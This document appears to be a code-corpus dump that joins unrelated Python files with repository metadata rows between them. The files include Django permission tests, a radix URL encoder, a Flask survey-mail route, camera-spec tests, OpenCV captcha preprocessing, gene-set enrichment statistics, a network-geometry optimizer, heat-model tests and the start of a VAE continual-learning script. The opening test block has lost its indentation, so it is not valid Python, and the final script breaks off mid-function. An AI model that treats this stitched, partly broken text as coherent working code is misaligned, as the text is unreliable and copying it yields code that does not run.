def test_create_organization_sys_admin_success(self):
""" Organization was created correctly """
self.client.force_authenticate(user=self.system_admin)
data = {'org_name': 'test_case', 'address': ['Florida']}
response = self.client.post("/organization/", data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_organization_inventory_manager_success(self):
""" Inventory manager and Stock Keeper is not allowed to create an organization """
self.client.force_authenticate(user=self.inventory_manager)
data = {'org_name': 'test_case'}
request = self.client.post("/organization/", data)
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_authenticate(user=self.stock_keeper)
new_request = self.client.post("/organization/", data)
self.assertEqual(new_request.status_code, status.HTTP_403_FORBIDDEN)
def test_create_organization_failure(self):
""" User can't create organization if missing fields """
self.client.force_authenticate(user=self.system_admin)
data = {}
request = self.client.post("/organization/", data, format='json')
self.assertEqual(request.status_code, status.HTTP_400_BAD_REQUEST)
def test_organization_unauthorized_request(self):
""" User can't access any of the method if token is not in header of request """
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_401_UNAUTHORIZED)
def test_organization_unauthorized_clearence(self):
""" IM and SK can't delete an organization """
self.client.force_authenticate(user=self.inventory_manager)
request = self.client.delete("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_authenticate(user=self.stock_keeper)
new_request = self.client.delete("/organization/")
self.assertEqual(new_request.status_code, status.HTTP_403_FORBIDDEN)
def test_get_all_organization(self):
""" IM can't get a list of organization """
self.client.force_authenticate(user=self.inventory_manager)
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
def test_unauthorized_get_all_organization(self):
""" SK can't get a list of organization """
self.client.force_authenticate(user=self.stock_keeper)
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
class InventoryItemRefreshTestCase(APITestCase):
fixtures = ["users.json", "organizations.json"]
@factory.django.mute_signals(signals.pre_save, signals.post_save)
def setUp(self):
self.client = APIClient()
self.organization = Organization.objects.get(pk=1).org_id
self.system_admin = CustomUser.objects.get(pk=1)
self.inventory_manager = CustomUser.objects.get(pk=2)
self.stock_keeper = CustomUser.objects.get(pk=3)
def test_org_inventory_item_refresh_time_sa(self):
""" Timing has been updated correctly """
self.client.force_authenticate(user=self.system_admin)
data = {'time': ['60'], 'new_job_interval': ['minutes'], 'ftp_location': ['ftp://host/inventory'], 'organization_id': ['1'], 'file': ['dummy_data.xlsx']}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_org_inventory_item_refresh_time_im(self):
""" Timing has been updated correctly """
self.client.force_authenticate(user=self.inventory_manager)
data = {'time': ['60'], 'new_job_interval': ['minutes'], 'ftp_location': ['ftp://host/inventory'], 'organization_id': ['1'], 'file': ['dummy_data.xlsx']}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_org_inventory_item_refresh_time_sk(self):
""" Timing shall not be updated by SK """
self.client.force_authenticate(user=self.stock_keeper)
data = {"organization": self.organization, "new_job_timing": "14"}
request = self.client.post("/InventoryItemRefreshTime/", data, format='json')
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
def test_org_item_refresh_time_fail(self):
"""
        Timing can't be updated for an
        organization that doesn't exist
"""
self.client.force_authenticate(user=self.system_admin)
data = {"organization_id": "1234", "time": "14"}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
| 45.985401
| 161
| 0.686667
| 6,046
| 0.959683
| 0
| 0
| 811
| 0.12873
| 0
| 0
| 1,545
| 0.245238
|
35f470bfac10a58409ff19aa1d364eb85ab7359d
| 1,656
|
py
|
Python
|
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | 1
|
2016-05-17T23:07:38.000Z
|
2016-05-17T23:07:38.000Z
|
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | null | null | null |
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from math import log2, ceil
# valid chars for a url path component: a-z A-Z 0-9 .-_~!$&'()*+,;=:@
# For the default set here (base 72) we have excluded $'();:@
radix_alphabet = ''.join(sorted(
"0123456789"
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
".-_~!&*+,="
))
radix = len(radix_alphabet)
radix_lookup = {ch: i for i, ch in enumerate(radix_alphabet)}
length_limit = ceil(128 / log2(radix)) # don't decode numbers much over 128 bits
# TODO: add radix alphabet as parameter
# TODO: fix format so length conveys more information (e.g. 0 and 00 and 000 are different with decimal alphabet)
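# int_to_natural / natural_to_int below form a zig-zag mapping between signed
# ints and non-negative ints (0, -1, 1, -2, 2, ... -> 0, 1, 2, 3, 4, ...).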
def int_to_natural(i):
i *= 2
if i < 0:
i = -i - 1
return i
def natural_to_int(n):
sign = n & 1
n >>= 1
return -n - 1 if sign else n
def natural_to_url(n):
"""Accepts an int and returns a url-compatible string representing it"""
# map from signed int to positive int
url = ""
while n:
n, digit = divmod(n, radix)
url += radix_alphabet[digit]
return url or radix_alphabet[0]
def url_to_natural(url):
"""Accepts a string and extracts the int it represents in this radix encoding"""
if not url or len(url) > length_limit:
return None
n = 0
try:
for ch in reversed(url):
n = n * radix + radix_lookup[ch]
except KeyError:
return None
return n
def int_to_bytes(i, order='little'):
byte_length = (i.bit_length() + 7 + (i >= 0)) >> 3
return i.to_bytes(byte_length, order, signed=True)
def bytes_to_int(b, order='little'):
return int.from_bytes(b, order, signed=True)
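# --- Illustrative round-trip sketch (not from the original module); it only
# exercises the helpers defined above. ---
if __name__ == '__main__':
    for value in (0, 1, -1, 12345, -2 ** 63):
        token = natural_to_url(int_to_natural(value))
        assert len(token) <= length_limit
        restored = natural_to_int(url_to_natural(token))
        assert restored == value, (value, token, restored)
        print(value, '->', token)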
| 24.352941
| 114
| 0.634662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 627
| 0.378623
|
35f52784cb920f6695ea0214e66ce046c4ba0969
| 961
|
py
|
Python
|
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
from flaskapp import app, db, mail
from flask import render_template, url_for
from flask import request, flash, redirect
# from flaskapp.model import User
from flaskapp.form import SurveyForm
from flask_mail import Message
@app.route('/', methods = ['POST', 'GET'])
def form():
form = SurveyForm()
if form.validate_on_submit():
# user = User(name=form.name.data, email=form.email.data)
# db.session.add(user)
# db.session.commit()
body = """
Thank you {} for filling the form!😊
""".format(form.name.data)
msg = Message(subject="survey form", sender='', recipients=[form.email.data], body=body)
mail.send(msg)
flash('Your feedback is successfully submitted!!', 'success')
return redirect(url_for('thank'))
return render_template('form.html', form=form)
@app.route('/thank')
def thank():
return render_template('thank.html')
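# --- Illustrative note (not part of the original routes) ---
# mail.send(msg) above assumes the Flask-Mail settings (MAIL_SERVER, MAIL_PORT,
# MAIL_USE_TLS, MAIL_USERNAME, MAIL_PASSWORD) are configured on the app created
# in flaskapp/__init__.py (not shown here), and that a usable sender address is
# available, either via the sender argument of Message(...) or via
# MAIL_DEFAULT_SENDER in the app config.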
| 32.033333
| 97
| 0.632674
| 0
| 0
| 0
| 0
| 727
| 0.754149
| 0
| 0
| 320
| 0.33195
|
35f622ff3fa5187c3265b7d1252636eaf5af175d
| 5,708
|
py
|
Python
|
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
tests/test_camera.py
|
Gokender/kameramera
|
7ebd9a196809c1e7ab117bb11b90bcea8d1eb8e7
|
[
"MIT"
] | null | null | null |
import unittest
from kameramera import camera
class Camera(unittest.TestCase):
def setUp(self):
self.camera = camera.Camera(camera_id='canon_ae1')
def test_general_manufacturer(self):
self.assertEqual(self.camera.general.manufacturer, 'Canon')
def test_general_name(self):
self.assertEqual(self.camera.general.name, 'Canon AE-1')
def test_general_type(self):
self.assertEqual(self.camera.general.type, 'SLR')
def test_general_format(self):
self.assertEqual(self.camera.general.format, '24x35')
def test_general_made_in(self):
self.assertEqual(self.camera.general.made_in, 'Japan')
def test_general_date(self):
self.assertEqual(self.camera.general.date, '1976-1984')
def test_general_body_construction(self):
self.assertEqual(self.camera.general.body_construction, 'metal')
def test_general_mount_threads(self):
self.assertEqual(self.camera.general.mount_threads, '1/4"')
def test_general_dimension(self):
self.assertEqual(self.camera.general.dimension, '141x87x47.5 mm')
def test_general_weight(self):
self.assertEqual(self.camera.general.weight, '620g')
def test_optics_lenses(self):
self.assertEqual(self.camera.optics.lenses, 'interchangeable')
def test_optics_lenses_mount(self):
self.assertEqual(self.camera.optics.lenses_mount, 'Canon FD')
def test_sighting_type(self):
self.assertEqual(self.camera.sighting.type, 'fixed eye-level pentaprism')
def test_sighting_display(self):
self.assertEqual(self.camera.sighting.display, False)
def test_sighting_viewfinder_rangefinder(self):
self.assertEqual(self.camera.sighting.viewfinder.rangefinder,
['split_image', 'microprism'])
def test_sighting_viewfinder_aperture(self):
self.assertEqual(self.camera.sighting.viewfinder.aperture, True)
def test_sighting_viewfinder_exposure_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.exposure_indicator, True)
def test_sighting_viewfinder_flash_indicator(self):
self.assertEqual(self.camera.sighting.viewfinder.flash_indicator, True)
def test_focus_manual(self):
self.assertEqual(self.camera.focus.manual, True)
def test_focus_autofocus(self):
self.assertEqual(self.camera.focus.autofocus, False)
def test_focus_stabilization(self):
self.assertEqual(self.camera.focus.stabilization, False)
def test_focus_depth_of_field(self):
self.assertEqual(self.camera.focus.depth_of_field, True)
def test_shutter_type(self):
self.assertEqual(self.camera.shutter.type, None)
def test_shutter_shutter_speeds(self):
self.assertEqual(self.camera.shutter.shutter_speeds, [
'2',
'1',
'1/2',
'1/4',
'1/8',
'1/15',
'1/30',
'1/60',
'1/125',
'1/250',
'1/500',
'1/1000'
])
def test_shutter_pose(self):
self.assertEqual(self.camera.shutter.pose, 'B')
def test_shutter_self_timer(self):
self.assertEqual(self.camera.shutter.self_timer, 10)
def test_exposure_mode(self):
self.assertEqual(self.camera.exposure.mode, ['M','S'])
def test_exposure_correction(self):
self.assertEqual(self.camera.exposure.correction, 1.5)
def test_exposure_measure_type(self):
self.assertEqual(self.camera.exposure.measure.type, 'TTL')
def test_exposure_measure_light_sensor(self):
self.assertEqual(self.camera.exposure.measure.light_sensor,
'silicon photon cell')
def test_exposure_measure_metering_mode(self):
self.assertEqual(self.camera.exposure.measure.metering_mode,
'center-weighted average metering')
def test_exposure_measure_memory(self):
self.assertEqual(self.camera.exposure.measure.memory, True)
def test_film_format(self):
self.assertEqual(self.camera.film.format, 135)
def test_film_advance(self):
self.assertEqual(self.camera.film.advance, 'manual')
def test_film_frame_counter(self):
self.assertEqual(self.camera.film.frame_counter, True)
def test_film_film_speed(self):
self.assertEqual(self.camera.film.film_speed, [
25,
32,
40,
50,
64,
80,
100,
125,
160,
200,
250,
320,
400,
500,
640,
800,
1000,
1250,
1600,
2000,
2500,
3200
])
def test_flash_built_in(self):
self.assertEqual(self.camera.flash.built_in, False)
def test_flash_hot_shoe(self):
self.assertEqual(self.camera.flash.hot_shoe, True)
def test_flash_synchronization(self):
self.assertEqual(self.camera.flash.synchronization, '1/60')
def test_power_required(self):
self.assertEqual(self.camera.power.required, True)
def test_power_source_number(self):
self.assertEqual(self.camera.power.source[0].number, 1)
def test_power_source_voltage(self):
self.assertEqual(self.camera.power.source[0].voltage, 6)
def test_power_source_type(self):
self.assertEqual(self.camera.power.source[0].type, [
'alkaline-manganese',
'silver oxyde',
'lithium'
])
| 31.711111
| 82
| 0.637176
| 5,659
| 0.991416
| 0
| 0
| 0
| 0
| 0
| 0
| 369
| 0.064646
|
35f678cde08c5ff864121819c46adfa1fdba45f0
| 887
|
py
|
Python
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 14
|
2020-02-03T22:30:48.000Z
|
2021-11-01T09:41:34.000Z
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 3
|
2020-11-28T17:24:28.000Z
|
2022-01-26T19:56:35.000Z
|
app/coordinates.py
|
krasch/simply_landmarks
|
8a5c3f2ff476377e44646a00e61b8287a53260e3
|
[
"MIT"
] | 4
|
2020-10-11T21:26:53.000Z
|
2021-09-14T03:59:20.000Z
|
from pathlib import Path
from PIL import Image
# coordinates are sent as slightly weird URL parameters (e.g. 0.png?214,243)
# parse them; this will crash the server if they arrive in an unexpected format
def parse_coordinates(args):
keys = list(args.keys())
assert len(keys) == 1
coordinates = keys[0]
assert len(coordinates.split(",")) == 2
x, y = coordinates.split(",")
x = int(x)
y = int(y)
return x, y
# image was not displayed in original size -> need to convert the coordinates
def init_scale_coordinates(image_dir: str, scaled_height: int):
image_dir = Path(image_dir)
def perform_scaling(image: str, x: int, y: int):
image = Image.open(str(image_dir / image))
original_width, original_height = image.size
scale = original_height / scaled_height
return int(x*scale), int(y*scale)
return perform_scaling
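# --- Minimal usage sketch (not from the original module); the directory and
# height below are made-up values, and the scaling call is left commented out
# because it needs a real image file on disk. ---
if __name__ == '__main__':
    # query args such as '0.png?214,243' arrive as a dict like {'214,243': ''}
    x, y = parse_coordinates({'214,243': ''})
    print('clicked at', x, y)
    # scale = init_scale_coordinates('images', scaled_height=400)
    # x, y = scale('0.png', x, y)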
| 27.71875
| 77
| 0.67982
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 230
| 0.259301
|
35f6bdfd466ccfcc3ec731821bd0d70b92cb5b92
| 2,851
|
py
|
Python
|
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | null | null | null |
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | 2
|
2021-01-22T09:10:33.000Z
|
2021-01-22T14:22:09.000Z
|
lib/tool_images.py
|
KTingLee/image-training
|
c02c7caa81a55b61e935d07ead27bcaed468eb0a
|
[
"MIT"
] | 1
|
2021-01-22T08:56:34.000Z
|
2021-01-22T08:56:34.000Z
|
import matplotlib.pyplot as plt
import numpy as np
import math
import cv2
kernel = np.ones((3, 3), np.int8)
# Remove noise via erosion
def eraseImage (image):
return cv2.erode(image, kernel, iterations = 1)
# Blur the image (Gaussian blur)
def blurImage (image):
return cv2.GaussianBlur(image, (5, 5), 0)
# Detect edges with Canny
# threshold1, threshold2: the smaller value is the minimum threshold used for edge detection
def edgedImage (image, threshold1 = 30, threshold2 = 150):
return cv2.Canny(image, threshold1, threshold2)
# Dilate the image
def dilateImage (image, level = (3, 3)):
level = np.ones(level, np.int8)
return cv2.dilate(image, level, iterations = 1)
# Get the bounding boxes of the characters
def getCharBox (image, minW = 15, minH = 15):
def setBoundingBox (contours):
box = []
for cnt in contours:
(x, y, w, h) = cv2.boundingRect(cnt)
            # NOTE: characters have a minimum size, so their boxes must pass basic width/height thresholds
if w > minW and h > minH:
box.append((x, y, w, h))
                # cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2)  # draw the box for each contour
# cv2.imshow('test', image)
return box
def removeInnerBox (boxes):
        # Sort the character bounding boxes by their x coordinate
boxes.sort(key = lambda e: e[0])
results = [boxes[0]]
for i in range(len(boxes) - 1):
x1, y1, w1, h1 = boxes[i]
x2, y2, w2, h2 = boxes[i+1]
if (x2 > x1 and x2 + w2 > x1 + w1):
results.append(boxes[i+1])
return results
contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
boundingBox = setBoundingBox(contours)
boundingBox = removeInnerBox(boundingBox)
return boundingBox
def showCharBox (image, boxes):
for x, y, w, h in boxes:
        cv2.rectangle(image, (x, y), (x + w, y + h), (127, 255, 0), 2)  # draw the box for each contour
cv2.imshow('charBox', image)
cv2.waitKey(0)
def showCountour (contours):
row = 2
col = math.ceil(len(contours)/row)
for i, cnt in enumerate(contours, start = 1):
x = []
y = []
# plt.subplot(row, col, i)
for point in cnt:
x.append(point[0][0])
y.append(point[0][1])
plt.plot(x, y)
plt.show()
def resizeImage (image, charBox, size = (50, 50)):
results = []
for (x, y, w, h) in charBox:
char = image[y:y+h, x:x+w]
char = cv2.resize(char, size)
results.append(char)
return results
def diffPictures (picA, picB):
err = np.sum( (picA.astype('float') - picB.astype('float')) ** 2 )
err /= float(picA.shape[0] * picA.shape[1])
return err
if __name__ == '__main__':
pic = cv2.imread('../captcha_Images/0.png')
print(pic)
cv2.imshow('pic', pic)
cv2.waitKey(0)
erosion = eraseImage(pic)
blured = blurImage(erosion)
edged = edgedImage(blured)
dilated = dilateImage(edged)
charBox = getCharBox(dilated)
showCharBox(dilated, charBox)
dilated = dilateImage(edged, (4, 4))
chars = resizeImage(dilated, charBox)
# input("Press Enter to continue.")
# c = result[0][0][0][0]
# print(c)
# plt.plot(c)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 25.684685
| 88
| 0.62785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 581
| 0.192193
|
35f6e6f91f9e05d76fd7957364cd9c3157a56978
| 2,965
|
py
|
Python
|
Code/geneset_testing.py
|
dylkot/EbolaSC
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | 2
|
2020-09-28T09:27:33.000Z
|
2021-01-04T09:16:42.000Z
|
Code/geneset_testing.py
|
dylkot/SC-Ebola
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | null | null | null |
Code/geneset_testing.py
|
dylkot/SC-Ebola
|
d363f9d2c10911f01c7b1d22fec2b192df2569b1
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
from scipy.stats import mannwhitneyu, fisher_exact, ranksums
def load_geneset(gmtfn, genes=None, minsize=0):
'''
Load genesets stored in gmt format (e.g. as provided by msigdb)
gmtfn : str
path to gmt file
genes : list, optional
only include genes in this input
minsize : int, optional
minimum geneset size to keep
Returns
-------
gsets : dict
gene_set_name : set of genes
allsetgenes : set
set of genes found in all genesets combined
'''
allsetgenes = set()
if genes is not None:
genes = set(genes)
gsets = {}
    effect_min_size = minsize  # gset name/description columns are already stripped below
with open(gmtfn) as F:
for l in F.readlines():
words = [x for x in l.rstrip().split('\t')]
gsetname = words[0]
setgenes = words[2:]
if genes is not None:
setgenes = set(setgenes).intersection(genes)
else:
                setgenes = set(setgenes)  # name/description were already dropped via words[2:]
if len(setgenes) >= effect_min_size:
gsets[gsetname] = setgenes
allsetgenes = allsetgenes.union(setgenes)
return(gsets, allsetgenes)
def fishertestbygep(gsets, signatures):
cols = []
for sig in signatures.columns:
cols.append((sig, 'OR'))
cols.append((sig, 'P'))
res = pd.DataFrame(index=list(gsets.keys()), columns=pd.MultiIndex.from_tuples(cols))
total = res.shape[0]
N = signatures.shape[0]
for sig in signatures.columns:
print(sig)
siggenes = set(signatures.index[signatures[sig]])
for (count,gs) in enumerate(res.index):
(OR,P, table) = run_fisher_exact(siggenes, gsets[gs], N)
res.at[gs,(sig,'OR')]=OR
res.at[gs,(sig,'P')]=P
return(res)
def run_fisher_exact(siggenes, setgenes, num_total):
numinter = len(setgenes.intersection(siggenes))
numunion = len(setgenes.union(siggenes))
table = [[numinter, len(siggenes) - numinter],
[len(setgenes)-numinter, num_total-numunion]]
(OR,P) = fisher_exact(table, alternative='two-sided')
return(OR, P, table)
def ranksumtestbygep(gsets, signatures):
cols = []
for sig in signatures.columns:
cols.append((sig, 'H'))
cols.append((sig, 'P'))
res = pd.DataFrame(index=list(gsets.keys()), columns=pd.MultiIndex.from_tuples(cols))
total = res.shape[0]
for (count,gs) in enumerate(res.index):
if (count % 100) == 0:
print('%d out of %d' % (count, total))
ind = signatures.index.isin(gsets[gs])
for sig in signatures.columns:
x1 = signatures.loc[ind, sig].dropna()
x2 = signatures.loc[~ind, sig].dropna()
(H,P) = ranksums(x1, x2)
res.at[gs,(sig,'H')]=H
res.at[gs,(sig,'P')]=P
return(res)
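# --- Toy example (not from the original module; gene and set names below are
# made up) showing how fishertestbygep expects its inputs. ---
if __name__ == '__main__':
    signatures = pd.DataFrame(
        {'GEP1': [True, True, True, False, False],
         'GEP2': [False, False, True, True, True]},
        index=['G1', 'G2', 'G3', 'G4', 'G5'])
    gsets = {'SET_A': {'G1', 'G2', 'G3'}, 'SET_B': {'G3', 'G4', 'G5'}}
    print(fishertestbygep(gsets, signatures))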
| 29.949495
| 89
| 0.57774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 518
| 0.174705
|
35f85f5cb5fab6226fab7a5a01b0882ca5ca7ca9
| 54
|
py
|
Python
|
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | 1
|
2022-03-12T20:41:21.000Z
|
2022-03-13T06:34:30.000Z
|
tests/src/import_func.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
from testlib_a.main_a import print_name
print_name()
| 13.5
| 39
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35f901a5b14d9bb965c94938ad6cacba20eb8f77
| 2,167
|
py
|
Python
|
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | null | null | null |
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | 20
|
2016-02-20T12:43:04.000Z
|
2016-12-23T13:57:25.000Z
|
nn_wtf/parameter_optimizers/brute_force_optimizer.py
|
lene/nn-wtf
|
4696f143d936e0c0c127847e3bb1e93a6e756d35
|
[
"Apache-2.0"
] | null | null | null |
import pprint
from nn_wtf.parameter_optimizers.neural_network_optimizer import NeuralNetworkOptimizer
__author__ = 'Lene Preuss <lene.preuss@gmail.com>'
class BruteForceOptimizer(NeuralNetworkOptimizer):
DEFAULT_LAYER_SIZES = (
(32, 48, 64), # (32, 48, 64, 80, 96, 128),
(32, 48, 64, 80, 96, 128),
(None, 16, 32, 48)
)
# self, tested_network, input_size, output_size, desired_training_precision,
def __init__(
self, tested_network, input_size, output_size, desired_training_precision,
layer_sizes=None, learning_rate=None, verbose=False, batch_size=100
):
super().__init__(
tested_network, input_size, output_size, desired_training_precision, verbose=verbose, batch_size=batch_size
)
self.learning_rate = learning_rate if learning_rate else self.DEFAULT_LEARNING_RATE
self.layer_sizes = self.DEFAULT_LAYER_SIZES if layer_sizes is None else layer_sizes
def best_parameters(self, data_sets, max_steps):
results = self.time_all_tested_geometries(data_sets, max_steps)
return results[0].optimization_parameters
def brute_force_optimal_network_geometry(self, data_sets, max_steps):
return self.best_parameters(data_sets, max_steps).geometry
def time_all_tested_geometries(self, data_sets, max_steps):
results = []
for geometry in self.get_network_geometries():
run_info = self.timed_run_training(
data_sets,
NeuralNetworkOptimizer.OptimizationParameters(geometry, self.learning_rate),
max_steps=max_steps
)
results.append(run_info)
results = sorted(results, key=lambda r: r.cpu_time)
if self.verbose: pprint.pprint(results, width=100)
return results
def get_network_geometries(self):
return ((l1, l2, l3)
for l1 in self.layer_sizes[0]
for l2 in self.layer_sizes[1] if l2 <= l1
for l3 in self.layer_sizes[2] if l3 is None or l3 <= l2)
def brute_force_optimize_learning_rate(self):
raise NotImplementedError()
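# --- Illustrative sketch (not from the original module): enumerate the
# candidate geometries the default layer sizes produce, without any training. ---
if __name__ == '__main__':
    sizes = BruteForceOptimizer.DEFAULT_LAYER_SIZES
    geometries = [(l1, l2, l3)
                  for l1 in sizes[0]
                  for l2 in sizes[1] if l2 <= l1
                  for l3 in sizes[2] if l3 is None or l3 <= l2]
    print('%d geometries, e.g. %s' % (len(geometries), geometries[:3]))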
| 38.696429
| 119
| 0.677434
| 2,008
| 0.926627
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.070143
|
35f926086eaca9043bf3f10e9c0ac0804430ebb4
| 1,856
|
py
|
Python
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 3
|
2020-10-20T08:59:19.000Z
|
2021-10-18T17:57:06.000Z
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 4
|
2019-04-19T20:07:15.000Z
|
2021-01-28T23:34:35.000Z
|
tests/test_get_value.py
|
mdpiper/bmi-example-python
|
e6b1e9105daef44fe1f0adba5b857cde1bbd032a
|
[
"MIT"
] | 7
|
2020-08-05T17:25:34.000Z
|
2021-09-08T21:38:33.000Z
|
#!/usr/bin/env python
from numpy.testing import assert_array_almost_equal, assert_array_less
import numpy as np
from heat import BmiHeat
def test_get_initial_value():
model = BmiHeat()
model.initialize()
z0 = model.get_value_ptr("plate_surface__temperature")
assert_array_less(z0, 1.0)
assert_array_less(0.0, z0)
def test_get_value_copy():
model = BmiHeat()
model.initialize()
dest0 = np.empty(model.get_grid_size(0), dtype=float)
dest1 = np.empty(model.get_grid_size(0), dtype=float)
z0 = model.get_value("plate_surface__temperature", dest0)
z1 = model.get_value("plate_surface__temperature", dest1)
assert z0 is not z1
assert_array_almost_equal(z0, z1)
def test_get_value_pointer():
model = BmiHeat()
model.initialize()
dest1 = np.empty(model.get_grid_size(0), dtype=float)
z0 = model.get_value_ptr("plate_surface__temperature")
z1 = model.get_value("plate_surface__temperature", dest1)
assert z0 is not z1
assert_array_almost_equal(z0.flatten(), z1)
for _ in range(10):
model.update()
assert z0 is model.get_value_ptr("plate_surface__temperature")
def test_get_value_at_indices():
model = BmiHeat()
model.initialize()
dest = np.empty(3, dtype=float)
z0 = model.get_value_ptr("plate_surface__temperature")
z1 = model.get_value_at_indices("plate_surface__temperature", dest, [0, 2, 4])
assert_array_almost_equal(z0.take((0, 2, 4)), z1)
def test_value_size():
model = BmiHeat()
model.initialize()
z = model.get_value_ptr("plate_surface__temperature")
assert model.get_grid_size(0) == z.size
def test_value_nbytes():
model = BmiHeat()
model.initialize()
z = model.get_value_ptr("plate_surface__temperature")
assert model.get_var_nbytes("plate_surface__temperature") == z.nbytes
| 24.746667
| 82
| 0.715517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 329
| 0.177263
|
35fac5891884a7fafbd906447065470f94dbe9cf
| 9,158
|
py
|
Python
|
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/dgm/exp.py
|
goldfarbDave/vcl
|
24fb33a1dcadfa6c6cf5e9e9838b64f4fd23143a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
dimZ = 50
dimH = 500
n_channel = 128
batch_size = 50
lr = 1e-4
K_mc = 10
checkpoint = -1
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
# set up dataset specific stuff
from config import config
labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)
if data_name == 'mnist':
from mnist import load_mnist
if data_name == 'notmnist':
from notmnist import load_notmnist
# import functionalities
if method == 'onlinevi':
from bayesian_generator import generator_head, generator_shared, \
generator, construct_gen
from onlinevi import construct_optimizer, init_shared_prior, \
update_shared_prior, update_q_sigma
if method in ['ewc', 'noreg', 'laplace', 'si']:
from generator import generator_head, generator_shared, generator, construct_gen
if method in ['ewc', 'noreg']:
from vae_ewc import construct_optimizer, lowerbound
if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
if method == 'laplace':
from vae_laplace import construct_optimizer, lowerbound
from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
if method == 'si':
from vae_si import construct_optimizer, lowerbound, update_si_reg
# then define model
n_layers_shared = 2
batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')
# initialise sessions
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
string = method
if method in ['ewc', 'laplace', 'si']:
